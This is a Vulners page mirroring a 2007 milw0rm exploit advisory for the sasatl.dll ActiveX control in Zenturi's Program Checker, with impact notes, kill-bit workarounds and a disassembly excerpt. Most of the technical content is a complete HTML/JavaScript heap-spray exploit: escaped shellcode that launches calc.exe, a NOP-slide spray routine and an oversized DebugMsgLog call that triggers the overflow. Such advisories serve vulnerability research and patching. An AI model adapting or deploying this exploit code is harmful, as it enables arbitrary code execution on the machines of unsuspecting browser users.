Vulners
Lucene search
Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray
:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
sasatl.dll 1.5.0.531 Program Checker-Method DebugMsgLog Heap Spraying Exploit
=============================================================================
Internal ID: VULWAR200707121.
Introduction
------------
sasatl.dll is a library included in the Program Checker Pro software package from the Company Zenturi. http://www.programchecker.com
Tested In
---------
- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
- Windows vista Professional English/French SP1 with IE 7.0
Summary
-------
The DebugMsgLog method is prone to a stack-based buffer-overflow vulnerability, because it fails to properly check boundaries.
Impact
------
An attacker could execute arbitrary code into the remote machine.
Workaround
----------
- Activate the Kill bit zero in clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F51.
- Unregister sasatl.dll using regsvr32.
Timeline
--------
July 12 2007 -- Exploit published.
Credits
-------
* Vulnerability Discovered by Will Dormann CERT/CC.
* Exploit by callAX <[email protected]> from GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Details
-----------------
.text:100340F3 sub_100340F3 proc near ; DATA XREF: .rdata:100ACA6Co
.text:100340F3 ; .rdata:100AFC1Cto
.text:100340F3 mov eax, offset sub_1009D47C
.text:100340F8 call __EH_prolog
.text:100340FD push dword ptr [ebp+0Ch] ; wchar_t *
.text:10034100 lea ecx, [ebp+0Ch]
.text:10034103 call sub_1005DC32
.text:10034108 push dword ptr [ebp+0Ch] ; char
.text:1003410B and dword ptr [ebp-4], 0
.text:1003410F push offset aCnixonconfig_4 ; "\r\n~CNixonConfigMgrEx::DebugMsgLog %s"
.text:10034114 push 1 ; int
.text:10034116 call sub_10003099
.text:1003411B or dword ptr [ebp-4], 0FFFFFFFFh
.text:1003411F add esp, 0Ch
.text:10034122 lea ecx, [ebp+0Ch]
.text:10034125 call sub_1005DB6B
.text:1003412A mov ecx, [ebp-0Ch]
.text:1003412D xor eax, eax
.text:1003412F mov large fs:0, ecx
.text:10034136 leave
.text:10034137 retn 8
Proof of Concept
----------------
<HTML>
<BODY>
<object id=boom classid="clsid:{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}"></object>
<h4>Will Dormann from CERT/CC is credited with the discovery.</H4><br>
<h4>This exploits executes calc.exe</h4>
<SCRIPT>
var payLoadCode=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var spraySlide = unescape("%u9090%u9090");
var heapSprayToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 2272;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.DebugMsgLog(x);
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return (spraySlide);
}
var heapBlockSize = 0x400000;
var SizeOfHeapDataMoreover = 0x5;
var payLoadSize = (payLoadCode.length * 2);
var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
</SCRIPT>
<input language=JavaScript onclick=Tryme() type=button value="Launch Exploit">
</BODY>
</HTML>
# milw0rm.com [2007-07-12]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4